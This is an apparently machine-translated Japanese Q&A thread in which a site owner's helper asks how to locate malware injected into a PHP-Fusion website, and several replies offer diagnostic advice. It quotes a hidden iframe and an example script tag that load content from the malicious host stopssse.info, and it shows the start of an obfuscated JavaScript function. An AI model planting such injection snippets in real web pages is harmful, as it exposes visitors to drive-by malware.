Webサイトがマルウェアに感染しているかどうかをテストするにはどうすればよいですか?
私の友人の何人かはウェブサイト(www.kennelsoffie.dk)を持っていて、何か問題があったときに彼らを助けようとしています。しかし、今回は理解できません。 Google Chromeを使用してサイトにアクセスすると、アクセスしようとしているページにstopssse.infoの要素が含まれていることを示す警告ページが表示されます。
PHPを知らないので、データベースのバックアップ(.sqlファイル)を含む完全なWebサイトをダウンロードしただけです。次に、すべてのファイルでstopssseを検索しましたが、何も見つかりませんでした。
また、siteadvisor.comでサイトをテストしたところ、「このサイトをテストしましたが、重大な問題は見つかりませんでした」と表示されています。
PHPマルウェアサイトへの参照を非表示にして、簡単な検索では見つけられないようにすることはできますか?もしそうなら、どのようにして見つけることができますか?
生成されたソースでこれを見つけました
<iframe height="0" width="0" src="http://stopssse.info/l.php?thx" style="display: none; visibility: hidden;">
これはbodyタグのすぐ下にあり、実際のページソースにはなく、難読化されたjavascriptによって追加されています。
編集: http://www.kennelsoffie.dk/includes/jscript.js の下部を見ると、非常に奇妙に見えるjavascript関数が表示されます。それは私があなたに話していた難読化されたjavascript関数です。それでは始まります
function lIIlOlIllI1000llII10l0OIIIlIOlIOI1O010l0(O00I10I0l00I0IOIO1Ol10O0Ol1Il1lI10OI00Il){var
最善の策は、それを見つけて削除することです。
あなたはおそらく [〜#〜] xss [〜#〜] 攻撃を扱っています。
その場合、2つのステップ:
- DBをスキャンして、「スクリプト」タグを探し、それらを取り除きます。
- PHPを知っている人を雇って、データ入力の穴を修正し、効率的なサニタイズポリシーを設定します。
このサイトで実行されているPHP-Fusionのバージョンはv6.01.3のようですが、これはかなり古いバージョンのように見えるので、アップグレードすることをお勧めします。
PHP-Fusionには、SQLインジェクションの問題など、かなりの数のセキュリティアドバイザリがあったようです。
PHP-Fusionのアドバイザリの完全なリストはこちら: http://secunia.com/advisories/product/5291/?task=advisories
サイトが クロスサイトスクリプティング を介して「感染」した場合、あなたが持っているのはおそらく、次のようなものを含むどこかにユーザーが送信したコメントです。
<SCRIPT SRC="http://stopssse.info/malware.js"></SCRIPT>
ただし、外部スクリプトが実行されるという事実を隠そうとする 多くのバリエーション があり、ソースURLも変更されて、単純な文字列検索が失敗する可能性があることに注意してください。
実際のディレクトリで固有のファイルを探します。安全でないアップロードフォームを介してアップロードされたファイルがあり、出力に追加のデータが書き込まれている可能性があります。友達にアカウント情報を変更して、サイトのセキュリティの確認を開始するように伝えます。
そこにあります。PHPファイルを確認してください(stopssseを検索してください)。
一般的なケースでは、難読化されたjavascrotを探すと、このツールが役立つことがよくあります。 Wepawet